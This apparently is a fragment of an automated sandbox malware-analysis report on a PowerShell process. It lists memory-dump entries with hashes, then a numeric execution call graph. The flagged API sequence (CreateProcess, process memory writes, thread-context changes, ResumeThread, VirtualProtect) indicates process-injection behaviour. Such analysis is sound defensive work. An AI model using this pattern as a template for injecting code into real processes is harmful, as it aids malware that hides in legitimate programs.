                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 60cb0fa6bb644f305a6f67e323fd0ec85f30456337f4c01e80f2b858707c4ecb
                                                                                                  • Instruction ID: 69f48f185515dd8225c971ae9da69dbde522bd714351b7a3546f2256f6f493af
                                                                                                  • Opcode Fuzzy Hash: 60cb0fa6bb644f305a6f67e323fd0ec85f30456337f4c01e80f2b858707c4ecb
                                                                                                  • Instruction Fuzzy Hash: F3C1A630918A8D8FDB78DF28CC567E977E1FB58310F15422AD84EC7291DE74AA418BC2

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: a594e4b4a918b8cee54253dcc15ce9c9fc01563d55bcb135e4263471f4ca568d
                                                                                                  • Instruction ID: ebc90d2e9574eddf9c28711b76ef3a945c238ae56604ce740dac524eb3ee1375
                                                                                                  • Opcode Fuzzy Hash: a594e4b4a918b8cee54253dcc15ce9c9fc01563d55bcb135e4263471f4ca568d
                                                                                                  • Instruction Fuzzy Hash: 2541D73191CB5C4FDB289FA898466F97BE0EB59720F00426FE459D3292DE74A8458BC1

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: c41531326e62d7d6f8422ecad22b79f2f0ac1785e5cdccebba1dff6d26feb6a3
                                                                                                  • Instruction ID: 6873526b855cba1c58115aefdccd14e6b30b2656e690aa2ca1a238aebf5aff8e
                                                                                                  • Opcode Fuzzy Hash: c41531326e62d7d6f8422ecad22b79f2f0ac1785e5cdccebba1dff6d26feb6a3
                                                                                                  • Instruction Fuzzy Hash: 9E311632D0CB1C4FDB289BA898466FA7BE1EF55321F04427FD04AC3292DF74A4068791

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: c8d450609cf57f4204678e0e31de08b2f4237cc9b14efe536e53535d1156df47
                                                                                                  • Instruction ID: 5e4977a445712f0574b380401bc7b8e61298be3d26203d537c7bcec16ff0f15e
                                                                                                  • Opcode Fuzzy Hash: c8d450609cf57f4204678e0e31de08b2f4237cc9b14efe536e53535d1156df47
                                                                                                  • Instruction Fuzzy Hash: 2B31163190D78C8FDB1ADBB888567E97FA0EF56320F0842AFD049C71A3DA785406CB91

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2746792345.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 15c8daf414aceea7ac699f5956f763d7db5652072f1d9a93492f1c2a02729da3
                                                                                                  • Instruction ID: 68c24b800b37b2e8b322751a9b501c0a46bc33ca0dbb16e210f8387d45decdd9
                                                                                                  • Opcode Fuzzy Hash: 15c8daf414aceea7ac699f5956f763d7db5652072f1d9a93492f1c2a02729da3
                                                                                                  • Instruction Fuzzy Hash: 0F41F822B1AE5E1FEFB897B814656B563C2EF54B55B0900BAD44DC31F6EE18AD014381

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2746792345.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24f296ba25fdf45aa62fcc59a5130fa698bbfd8694d3548b3f861cde6ad82a42
                                                                                                  • Instruction ID: 097329ae9479464e86a1eca165380b181a5f9c7266c86e4be4265e0f2b734a60
                                                                                                  • Opcode Fuzzy Hash: 24f296ba25fdf45aa62fcc59a5130fa698bbfd8694d3548b3f861cde6ad82a42
                                                                                                  • Instruction Fuzzy Hash: 7D01A512F2EE5E1AF3B997AC282917466C1DFD4E20F4602B7D81CC3196ED14AD124285

                                                                                                  Execution Graph

                                                                                                  Execution Coverage: 2.7%
                                                                                                  Dynamic/Decrypted Code Coverage: 100%
                                                                                                  Signature Coverage: 2%
                                                                                                  Total number of Nodes: 1659
                                                                                                  Total number of Limit Nodes: 5
6063->6062 6064 10006368 _free 20 API calls 6063->6064 6064->6060 6068 10006231 6065->6068 6067 100062b8 6067->6062 6069 10005b7a _free 20 API calls 6068->6069 6070 10006247 6069->6070 6071 100062a6 6070->6071 6075 10006255 6070->6075 6079 100062bc IsProcessorFeaturePresent 6071->6079 6073 100062ab 6074 10006231 _abort 26 API calls 6073->6074 6076 100062b8 6074->6076 6077 10002ada _ValidateLocalCookies 5 API calls 6075->6077 6076->6067 6078 1000627c 6077->6078 6078->6067 6080 100062c7 6079->6080 6083 100060e2 6080->6083 6084 100060fe ___scrt_fastfail 6083->6084 6085 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6084->6085 6087 100061fb ___scrt_fastfail 6085->6087 6086 10002ada _ValidateLocalCookies 5 API calls 6088 10006219 GetCurrentProcess TerminateProcess 6086->6088 6087->6086 6088->6073 7588 100021a1 ___scrt_dllmain_exception_filter 6089 10009c23 6090 10009c56 6089->6090 6091 10009c28 6089->6091 6127 10009728 6090->6127 6092 10009c46 6091->6092 6093 10009c2d 6091->6093 6119 100098f5 6092->6119 6095 10009ccd 6093->6095 6112 10009807 6093->6112 6098 10006368 _free 20 API calls 6095->6098 6103 10009cc0 6095->6103 6100 10009cf2 6098->6100 6099 10009bf2 6099->6095 6102 10009ca9 6099->6102 6099->6103 6101 10006355 __dosmaperr 20 API calls 6100->6101 6101->6103 6105 10009cb0 6102->6105 6106 10009cc4 6102->6106 6104 10002ada _ValidateLocalCookies 5 API calls 6103->6104 6107 10009d15 6104->6107 6109 10006368 _free 20 API calls 6105->6109 6137 10006332 6106->6137 6110 10009cb5 6109->6110 6134 10006355 6110->6134 6114 10009816 6112->6114 6113 100098d8 6116 10002ada _ValidateLocalCookies 5 API calls 6113->6116 6114->6113 6115 10009894 WriteFile 6114->6115 6115->6114 6117 100098da GetLastError 6115->6117 6118 100098f1 6116->6118 6117->6113 6118->6099 6120 10009904 6119->6120 6121 10009a0f 6120->6121 6124 10009986 WideCharToMultiByte 6120->6124 6126 100099bb WriteFile 6120->6126 6122 10002ada _ValidateLocalCookies 5 API calls 6121->6122 6123 
10009a1e 6122->6123 6123->6099 6125 10009a07 GetLastError 6124->6125 6124->6126 6125->6121 6126->6120 6126->6125 6132 10009737 6127->6132 6128 100097ea 6129 10002ada _ValidateLocalCookies 5 API calls 6128->6129 6131 10009803 6129->6131 6130 100097a9 WriteFile 6130->6132 6133 100097ec GetLastError 6130->6133 6131->6099 6132->6128 6132->6130 6133->6128 6135 10005b7a _free 20 API calls 6134->6135 6136 1000635a 6135->6136 6136->6103 6138 10006355 __dosmaperr 20 API calls 6137->6138 6139 1000633d _free 6138->6139 6140 10006368 _free 20 API calls 6139->6140 6141 10006350 6140->6141 6141->6103 5763 1000c7a7 5764 1000c7be 5763->5764 5770 1000c82c 5763->5770 5764->5770 5775 1000c7e6 GetModuleHandleA 5764->5775 5766 1000c835 GetModuleHandleA 5769 1000c83f 5766->5769 5767 1000c872 5768 1000c7dd 5768->5769 5768->5770 5772 1000c800 GetProcAddress 5768->5772 5769->5770 5771 1000c85f GetProcAddress 5769->5771 5770->5766 5770->5767 5770->5769 5771->5770 5772->5770 5773 1000c80d VirtualProtect 5772->5773 5773->5770 5774 1000c81c VirtualProtect 5773->5774 5774->5770 5776 1000c82c 5775->5776 5777 1000c7ef 5775->5777 5780 1000c872 5776->5780 5781 1000c835 GetModuleHandleA 5776->5781 5785 1000c83f 5776->5785 5787 1000c803 GetProcAddress 5777->5787 5779 1000c7f4 5779->5776 5782 1000c800 GetProcAddress 5779->5782 5781->5785 5782->5776 5783 1000c80d VirtualProtect 5782->5783 5783->5776 5784 1000c81c VirtualProtect 5783->5784 5784->5776 5785->5776 5786 1000c85f GetProcAddress 5785->5786 5786->5776 5788 1000c82c 5787->5788 5789 1000c80d VirtualProtect 5787->5789 5791 1000c872 5788->5791 5792 1000c835 GetModuleHandleA 5788->5792 5789->5788 5790 1000c81c VirtualProtect 5789->5790 5790->5788 5794 1000c83f 5792->5794 5793 1000c85f GetProcAddress 5793->5794 5794->5788 5794->5793 7589 10009fa7 7590 10006368 _free 20 API calls 7589->7590 7591 10009fac 7590->7591 6142 1000742b 6143 10007430 6142->6143 6144 10007453 6143->6144 6146 10008bae 6143->6146 6147 10008bdd 6146->6147 6148 10008bbb 
6146->6148 6147->6143 6149 10008bd7 6148->6149 6150 10008bc9 RtlDeleteCriticalSection 6148->6150 6151 1000571e _free 20 API calls 6149->6151 6150->6149 6150->6150 6151->6147 6936 100060ac 6937 100060dd 6936->6937 6939 100060b7 6936->6939 6938 100060c7 FreeLibrary 6938->6939 6939->6937 6939->6938 6940 1000aeac 6941 1000aeb5 6940->6941 6942 10008cc1 21 API calls 6941->6942 6943 1000aebb 6942->6943 6944 10006332 __dosmaperr 20 API calls 6943->6944 6945 1000aedd 6943->6945 6944->6945 6152 10005630 6153 1000563b 6152->6153 6155 10005664 6153->6155 6156 10005660 6153->6156 6158 10005eb7 6153->6158 6165 10005688 6155->6165 6159 10005c45 _free 5 API calls 6158->6159 6160 10005ede 6159->6160 6161 10005efc InitializeCriticalSectionAndSpinCount 6160->6161 6162 10005ee7 6160->6162 6161->6162 6163 10002ada _ValidateLocalCookies 5 API calls 6162->6163 6164 10005f13 6163->6164 6164->6153 6166 10005695 6165->6166 6168 100056b4 6165->6168 6167 1000569f RtlDeleteCriticalSection 6166->6167 6167->6167 6167->6168 6168->6156 6950 100096b2 6957 10008dbc 6950->6957 6952 100096c7 6953 100096c2 6953->6952 6954 10005af6 _abort 38 API calls 6953->6954 6955 100096ea 6954->6955 6955->6952 6956 10009708 GetConsoleMode 6955->6956 6956->6952 6958 10008dc9 6957->6958 6960 10008dd6 6957->6960 6959 10006368 _free 20 API calls 6958->6959 6962 10008dce 6959->6962 6961 10006368 _free 20 API calls 6960->6961 6963 10008de2 6960->6963 6964 10008e03 6961->6964 6962->6953 6963->6953 6965 100062ac _abort 26 API calls 6964->6965 6965->6962 6966 10003eb3 6967 10005411 38 API calls 6966->6967 6968 10003ebb 6967->6968 7192 10008b34 7193 1000637b _free 20 API calls 7192->7193 7194 10008b46 7193->7194 7196 10005eb7 11 API calls 7194->7196 7198 10008b53 7194->7198 7195 1000571e _free 20 API calls 7197 10008ba5 7195->7197 7196->7194 7198->7195 7199 10009b3c 7200 10006355 __dosmaperr 20 API calls 7199->7200 7201 10009b44 7200->7201 7202 10006368 _free 20 API calls 7201->7202 7203 10009b4b 7202->7203 7204 100062ac 
_abort 26 API calls 7203->7204 7205 10009b56 7204->7205 7206 10002ada _ValidateLocalCookies 5 API calls 7205->7206 7207 10009d15 7206->7207 6169 1000543d 6170 10005440 6169->6170 6173 100055a8 6170->6173 6184 10007613 6173->6184 6177 100055c2 IsProcessorFeaturePresent 6181 100055cd 6177->6181 6178 100055e0 6214 10004bc1 6178->6214 6180 100055b8 6180->6177 6180->6178 6183 100060e2 _abort 8 API calls 6181->6183 6183->6178 6217 10007581 6184->6217 6187 1000766e 6188 1000767a _abort 6187->6188 6189 10005b7a _free 20 API calls 6188->6189 6193 100076a7 _abort 6188->6193 6194 100076a1 _abort 6188->6194 6189->6194 6190 100076f3 6191 10006368 _free 20 API calls 6190->6191 6192 100076f8 6191->6192 6195 100062ac _abort 26 API calls 6192->6195 6199 1000771f 6193->6199 6231 10005671 RtlEnterCriticalSection 6193->6231 6194->6190 6194->6193 6213 100076d6 6194->6213 6195->6213 6200 1000777e 6199->6200 6202 10007776 6199->6202 6210 100077a9 6199->6210 6232 100056b9 RtlLeaveCriticalSection 6199->6232 6200->6210 6233 10007665 6200->6233 6205 10004bc1 _abort 28 API calls 6202->6205 6205->6200 6209 10007665 _abort 38 API calls 6209->6210 6236 1000782e 6210->6236 6211 1000780c 6212 10005af6 _abort 38 API calls 6211->6212 6211->6213 6212->6213 6260 1000bdc9 6213->6260 6264 1000499b 6214->6264 6220 10007527 6217->6220 6219 100055ad 6219->6180 6219->6187 6221 10007533 ___scrt_is_nonwritable_in_current_image 6220->6221 6226 10005671 RtlEnterCriticalSection 6221->6226 6223 10007541 6227 10007575 6223->6227 6225 10007568 _abort 6225->6219 6226->6223 6230 100056b9 RtlLeaveCriticalSection 6227->6230 6229 1000757f 6229->6225 6230->6229 6231->6199 6232->6202 6234 10005af6 _abort 38 API calls 6233->6234 6235 1000766a 6234->6235 6235->6209 6237 10007834 6236->6237 6239 100077fd 6236->6239 6263 100056b9 RtlLeaveCriticalSection 6237->6263 6239->6211 6239->6213 6240 10005af6 GetLastError 6239->6240 6241 10005b12 6240->6241 6242 10005b0c 6240->6242 6243 1000637b _free 20 API calls 6241->6243 6246 
10005b61 SetLastError 6241->6246 6244 10005e08 _free 11 API calls 6242->6244 6245 10005b24 6243->6245 6244->6241 6247 10005b2c 6245->6247 6248 10005e5e _free 11 API calls 6245->6248 6246->6211 6249 1000571e _free 20 API calls 6247->6249 6250 10005b41 6248->6250 6251 10005b32 6249->6251 6250->6247 6252 10005b48 6250->6252 6253 10005b6d SetLastError 6251->6253 6254 1000593c _free 20 API calls 6252->6254 6255 100055a8 _abort 35 API calls 6253->6255 6256 10005b53 6254->6256 6257 10005b79 6255->6257 6258 1000571e _free 20 API calls 6256->6258 6259 10005b5a 6258->6259 6259->6246 6259->6253 6261 10002ada _ValidateLocalCookies 5 API calls 6260->6261 6262 1000bdd4 6261->6262 6262->6262 6263->6239 6265 100049a7 _abort 6264->6265 6266 100049bf 6265->6266 6286 10004af5 GetModuleHandleW 6265->6286 6295 10005671 RtlEnterCriticalSection 6266->6295 6270 10004a65 6303 10004aa5 6270->6303 6274 10004a3c 6275 10004a54 6274->6275 6299 10004669 6274->6299 6281 10004669 _abort 5 API calls 6275->6281 6276 100049c7 6276->6270 6276->6274 6296 1000527a 6276->6296 6277 10004a82 6306 10004ab4 6277->6306 6278 10004aae 6279 1000bdc9 _abort 5 API calls 6278->6279 6284 10004ab3 6279->6284 6281->6270 6287 100049b3 6286->6287 6287->6266 6288 10004b39 GetModuleHandleExW 6287->6288 6289 10004b63 GetProcAddress 6288->6289 6290 10004b78 6288->6290 6289->6290 6291 10004b95 6290->6291 6292 10004b8c FreeLibrary 6290->6292 6293 10002ada _ValidateLocalCookies 5 API calls 6291->6293 6292->6291 6294 10004b9f 6293->6294 6294->6266 6295->6276 6314 10005132 6296->6314 6300 10004698 6299->6300 6301 10002ada _ValidateLocalCookies 5 API calls 6300->6301 6302 100046c1 6301->6302 6302->6275 6336 100056b9 RtlLeaveCriticalSection 6303->6336 6305 10004a7e 6305->6277 6305->6278 6337 10006025 6306->6337 6309 10004ae2 6312 10004b39 _abort 8 API calls 6309->6312 6310 10004ac2 GetPEB 6310->6309 6311 10004ad2 GetCurrentProcess TerminateProcess 6310->6311 6311->6309 6313 10004aea ExitProcess 6312->6313 6317 100050e1 6314->6317 
6316 10005156 6316->6274 6318 100050ed ___scrt_is_nonwritable_in_current_image 6317->6318 6325 10005671 RtlEnterCriticalSection 6318->6325 6320 100050fb 6326 1000515a 6320->6326 6324 10005119 _abort 6324->6316 6325->6320 6327 1000517a 6326->6327 6330 10005182 6326->6330 6328 10002ada _ValidateLocalCookies 5 API calls 6327->6328 6329 10005108 6328->6329 6332 10005126 6329->6332 6330->6327 6331 1000571e _free 20 API calls 6330->6331 6331->6327 6335 100056b9 RtlLeaveCriticalSection 6332->6335 6334 10005130 6334->6324 6335->6334 6336->6305 6338 1000604a 6337->6338 6342 10006040 6337->6342 6339 10005c45 _free 5 API calls 6338->6339 6339->6342 6340 10002ada _ValidateLocalCookies 5 API calls 6341 10004abe 6340->6341 6341->6309 6341->6310 6342->6340 7208 10001f3f 7209 10001f4b ___scrt_is_nonwritable_in_current_image 7208->7209 7226 1000247c 7209->7226 7211 10001f52 7212 10002041 7211->7212 7213 10001f7c 7211->7213 7225 10001f57 ___scrt_is_nonwritable_in_current_image 7211->7225 7215 10002639 ___scrt_fastfail 4 API calls 7212->7215 7237 100023de 7213->7237 7216 10002048 7215->7216 7217 10001f8b __RTC_Initialize 7217->7225 7240 100022fc RtlInitializeSListHead 7217->7240 7219 10001f99 ___scrt_initialize_default_local_stdio_options 7241 100046c5 7219->7241 7223 10001fb8 7224 10004669 _abort 5 API calls 7223->7224 7223->7225 7224->7225 7227 10002485 7226->7227 7249 10002933 IsProcessorFeaturePresent 7227->7249 7231 10002496 7232 1000249a 7231->7232 7260 100053c8 7231->7260 7232->7211 7235 100024b1 7235->7211 7236 10003529 ___vcrt_uninitialize 8 API calls 7236->7232 7291 100024b5 7237->7291 7239 100023e5 7239->7217 7240->7219 7243 100046dc 7241->7243 7242 10002ada _ValidateLocalCookies 5 API calls 7244 10001fad 7242->7244 7243->7242 7244->7225 7245 100023b3 7244->7245 7246 100023b8 ___scrt_release_startup_lock 7245->7246 7247 10002933 ___isa_available_init IsProcessorFeaturePresent 7246->7247 7248 100023c1 7246->7248 7247->7248 7248->7223 7250 10002491 7249->7250 7251 100034ea 
7250->7251 7252 100034ef ___vcrt_initialize_winapi_thunks 7251->7252 7263 10003936 7252->7263 7255 100034fd 7255->7231 7257 10003505 7258 10003510 7257->7258 7259 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7257->7259 7258->7231 7259->7255 7287 10007457 7260->7287 7264 1000393f 7263->7264 7266 10003968 7264->7266 7267 100034f9 7264->7267 7277 10003be0 7264->7277 7268 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7266->7268 7267->7255 7269 100038e8 7267->7269 7268->7267 7282 10003af1 7269->7282 7272 100038fd 7272->7257 7273 10003ba2 ___vcrt_FlsSetValue 6 API calls 7274 1000390b 7273->7274 7275 10003918 7274->7275 7276 1000391b ___vcrt_uninitialize_ptd 6 API calls 7274->7276 7275->7257 7276->7272 7278 10003a82 try_get_function 5 API calls 7277->7278 7279 10003bfa 7278->7279 7280 10003c18 InitializeCriticalSectionAndSpinCount 7279->7280 7281 10003c03 7279->7281 7280->7281 7281->7264 7283 10003a82 try_get_function 5 API calls 7282->7283 7284 10003b0b 7283->7284 7285 10003b24 TlsAlloc 7284->7285 7286 100038f2 7284->7286 7286->7272 7286->7273 7290 10007470 7287->7290 7288 10002ada _ValidateLocalCookies 5 API calls 7289 100024a3 7288->7289 7289->7235 7289->7236 7290->7288 7292 100024c4 7291->7292 7293 100024c8 7291->7293 7292->7239 7294 10002639 ___scrt_fastfail 4 API calls 7293->7294 7296 100024d5 ___scrt_release_startup_lock 7293->7296 7295 10002559 7294->7295 7296->7239 6343 10008640 6346 10008657 6343->6346 6347 10008665 6346->6347 6348 10008679 6346->6348 6351 10006368 _free 20 API calls 6347->6351 6349 10008681 6348->6349 6350 10008693 6348->6350 6352 10006368 _free 20 API calls 6349->6352 6358 10008652 6350->6358 6359 100054a7 6350->6359 6353 1000866a 6351->6353 6354 10008686 6352->6354 6356 100062ac _abort 26 API calls 6353->6356 6357 100062ac _abort 26 API calls 6354->6357 6356->6358 6357->6358 6360 100054c4 6359->6360 6361 100054ba 6359->6361 6360->6361 6362 10005af6 _abort 38 API calls 6360->6362 6361->6358 6363 100054e5 
6362->6363 6367 10007a00 6363->6367 6368 10007a13 6367->6368 6369 100054fe 6367->6369 6368->6369 6375 10007f0f 6368->6375 6371 10007a2d 6369->6371 6372 10007a40 6371->6372 6373 10007a55 6371->6373 6372->6373 6510 10006d7e 6372->6510 6373->6361 6376 10007f1b ___scrt_is_nonwritable_in_current_image 6375->6376 6377 10005af6 _abort 38 API calls 6376->6377 6378 10007f24 6377->6378 6379 10007f72 _abort 6378->6379 6387 10005671 RtlEnterCriticalSection 6378->6387 6379->6369 6381 10007f42 6388 10007f86 6381->6388 6386 100055a8 _abort 38 API calls 6386->6379 6387->6381 6389 10007f56 6388->6389 6390 10007f94 _free 6388->6390 6392 10007f75 6389->6392 6390->6389 6395 10007cc2 6390->6395 6509 100056b9 RtlLeaveCriticalSection 6392->6509 6394 10007f69 6394->6379 6394->6386 6396 10007d42 6395->6396 6399 10007cd8 6395->6399 6397 10007d90 6396->6397 6400 1000571e _free 20 API calls 6396->6400 6463 10007e35 6397->6463 6399->6396 6401 10007d0b 6399->6401 6406 1000571e _free 20 API calls 6399->6406 6402 10007d64 6400->6402 6403 10007d2d 6401->6403 6412 1000571e _free 20 API calls 6401->6412 6404 1000571e _free 20 API calls 6402->6404 6405 1000571e _free 20 API calls 6403->6405 6407 10007d77 6404->6407 6409 10007d37 6405->6409 6411 10007d00 6406->6411 6413 1000571e _free 20 API calls 6407->6413 6408 10007d9e 6410 10007dfe 6408->6410 6422 1000571e 20 API calls _free 6408->6422 6414 1000571e _free 20 API calls 6409->6414 6415 1000571e _free 20 API calls 6410->6415 6423 100090ba 6411->6423 6417 10007d22 6412->6417 6418 10007d85 6413->6418 6414->6396 6421 10007e04 6415->6421 6451 100091b8 6417->6451 6420 1000571e _free 20 API calls 6418->6420 6420->6397 6421->6389 6422->6408 6424 100090cb 6423->6424 6450 100091b4 6423->6450 6425 100090dc 6424->6425 6426 1000571e _free 20 API calls 6424->6426 6427 100090ee 6425->6427 6428 1000571e _free 20 API calls 6425->6428 6426->6425 6429 10009100 6427->6429 6431 1000571e _free 20 API calls 6427->6431 6428->6427 6430 10009112 6429->6430 6432 1000571e 
_free 20 API calls 6429->6432 6433 10009124 6430->6433 6434 1000571e _free 20 API calls 6430->6434 6431->6429 6432->6430 6435 10009136 6433->6435 6436 1000571e _free 20 API calls 6433->6436 6434->6433 6437 10009148 6435->6437 6438 1000571e _free 20 API calls 6435->6438 6436->6435 6439 1000571e _free 20 API calls 6437->6439 6440 1000915a 6437->6440 6438->6437 6439->6440 6441 1000916c 6440->6441 6442 1000571e _free 20 API calls 6440->6442 6443 1000917e 6441->6443 6444 1000571e _free 20 API calls 6441->6444 6442->6441 6445 10009190 6443->6445 6447 1000571e _free 20 API calls 6443->6447 6444->6443 6446 100091a2 6445->6446 6448 1000571e _free 20 API calls 6445->6448 6449 1000571e _free 20 API calls 6446->6449 6446->6450 6447->6445 6448->6446 6449->6450 6450->6401 6452 100091c5 6451->6452 6462 1000921d 6451->6462 6453 100091d5 6452->6453 6454 1000571e _free 20 API calls 6452->6454 6455 100091e7 6453->6455 6456 1000571e _free 20 API calls 6453->6456 6454->6453 6457 1000571e _free 20 API calls 6455->6457 6458 100091f9 6455->6458 6456->6455 6457->6458 6459 1000920b 6458->6459 6460 1000571e _free 20 API calls 6458->6460 6461 1000571e _free 20 API calls 6459->6461 6459->6462 6460->6459 6461->6462 6462->6403 6464 10007e60 6463->6464 6465 10007e42 6463->6465 6464->6408 6465->6464 6469 1000925d 6465->6469 6468 1000571e _free 20 API calls 6468->6464 6470 10007e5a 6469->6470 6471 1000926e 6469->6471 6470->6468 6505 10009221 6471->6505 6474 10009221 _free 20 API calls 6475 10009281 6474->6475 6476 10009221 _free 20 API calls 6475->6476 6477 1000928c 6476->6477 6478 10009221 _free 20 API calls 6477->6478 6479 10009297 6478->6479 6480 10009221 _free 20 API calls 6479->6480 6481 100092a5 6480->6481 6482 1000571e _free 20 API calls 6481->6482 6483 100092b0 6482->6483 6484 1000571e _free 20 API calls 6483->6484 6485 100092bb 6484->6485 6486 1000571e _free 20 API calls 6485->6486 6487 100092c6 6486->6487 6488 10009221 _free 20 API calls 6487->6488 6489 100092d4 6488->6489 6490 10009221 
_free 20 API calls 6489->6490 6491 100092e2 6490->6491 6492 10009221 _free 20 API calls 6491->6492 6493 100092f3 6492->6493 6494 10009221 _free 20 API calls 6493->6494 6495 10009301 6494->6495 6496 10009221 _free 20 API calls 6495->6496 6497 1000930f 6496->6497 6498 1000571e _free 20 API calls 6497->6498 6499 1000931a 6498->6499 6500 1000571e _free 20 API calls 6499->6500 6501 10009325 6500->6501 6502 1000571e _free 20 API calls 6501->6502 6503 10009330 6502->6503 6504 1000571e _free 20 API calls 6503->6504 6504->6470 6506 10009258 6505->6506 6507 10009248 6505->6507 6506->6474 6507->6506 6508 1000571e _free 20 API calls 6507->6508 6508->6507 6509->6394 6511 10006d8a ___scrt_is_nonwritable_in_current_image 6510->6511 6512 10005af6 _abort 38 API calls 6511->6512 6517 10006d94 6512->6517 6514 10006e18 _abort 6514->6373 6516 100055a8 _abort 38 API calls 6516->6517 6517->6514 6517->6516 6518 1000571e _free 20 API calls 6517->6518 6519 10005671 RtlEnterCriticalSection 6517->6519 6520 10006e0f 6517->6520 6518->6517 6519->6517 6523 100056b9 RtlLeaveCriticalSection 6520->6523 6522 10006e16 6522->6517 6523->6522 7297 1000af43 7298 1000af59 7297->7298 7299 1000af4d 7297->7299 7299->7298 7300 1000af52 CloseHandle 7299->7300 7300->7298 7301 1000a945 7303 1000a96d 7301->7303 7302 1000a9a5 7303->7302 7304 1000a997 7303->7304 7305 1000a99e 7303->7305 7310 1000aa17 7304->7310 7314 1000aa00 7305->7314 7311 1000aa20 7310->7311 7318 1000b19b 7311->7318 7315 1000aa20 7314->7315 7316 1000b19b __startOneArgErrorHandling 21 API calls 7315->7316 7317 1000a9a3 7316->7317 7319 1000b1da __startOneArgErrorHandling 7318->7319 7324 1000b25c __startOneArgErrorHandling 7319->7324 7328 1000b59e 7319->7328 7321 1000b286 7322 1000b8b2 __startOneArgErrorHandling 20 API calls 7321->7322 7323 1000b292 7321->7323 7322->7323 7326 10002ada _ValidateLocalCookies 5 API calls 7323->7326 7324->7321 7325 100078a3 __startOneArgErrorHandling 5 API calls 7324->7325 7325->7321 7327 1000a99c 7326->7327 7329 
1000b5c1 __raise_exc RaiseException 7328->7329 7330 1000b5bc 7329->7330 7330->7324 7592 1000a1c6 IsProcessorFeaturePresent 7593 10007bc7 7594 10007bd3 ___scrt_is_nonwritable_in_current_image 7593->7594 7595 10007c0a _abort 7594->7595 7601 10005671 RtlEnterCriticalSection 7594->7601 7597 10007be7 7598 10007f86 20 API calls 7597->7598 7599 10007bf7 7598->7599 7602 10007c10 7599->7602 7601->7597 7605 100056b9 RtlLeaveCriticalSection 7602->7605 7604 10007c17 7604->7595 7605->7604 7331 10005348 7332 10003529 ___vcrt_uninitialize 8 API calls 7331->7332 7333 1000534f 7332->7333 7334 10007b48 7344 10008ebf 7334->7344 7338 10007b55 7357 1000907c 7338->7357 7341 10007b7f 7342 1000571e _free 20 API calls 7341->7342 7343 10007b8a 7342->7343 7361 10008ec8 7344->7361 7346 10007b50 7347 10008fdc 7346->7347 7348 10008fe8 ___scrt_is_nonwritable_in_current_image 7347->7348 7381 10005671 RtlEnterCriticalSection 7348->7381 7350 1000905e 7395 10009073 7350->7395 7351 10008ff3 7351->7350 7353 10009032 RtlDeleteCriticalSection 7351->7353 7382 1000a09c 7351->7382 7356 1000571e _free 20 API calls 7353->7356 7354 1000906a _abort 7354->7338 7356->7351 7358 10007b64 RtlDeleteCriticalSection 7357->7358 7359 10009092 7357->7359 7358->7338 7358->7341 7359->7358 7360 1000571e _free 20 API calls 7359->7360 7360->7358 7362 10008ed4 ___scrt_is_nonwritable_in_current_image 7361->7362 7371 10005671 RtlEnterCriticalSection 7362->7371 7364 10008f77 7376 10008f97 7364->7376 7368 10008f83 _abort 7368->7346 7369 10008e78 30 API calls 7370 10008ee3 7369->7370 7370->7364 7370->7369 7372 10007b94 RtlEnterCriticalSection 7370->7372 7373 10008f6d 7370->7373 7371->7370 7372->7370 7379 10007ba8 RtlLeaveCriticalSection 7373->7379 7375 10008f75 7375->7370 7380 100056b9 RtlLeaveCriticalSection 7376->7380 7378 10008f9e 7378->7368 7379->7375 7380->7378 7381->7351 7383 1000a0a8 ___scrt_is_nonwritable_in_current_image 7382->7383 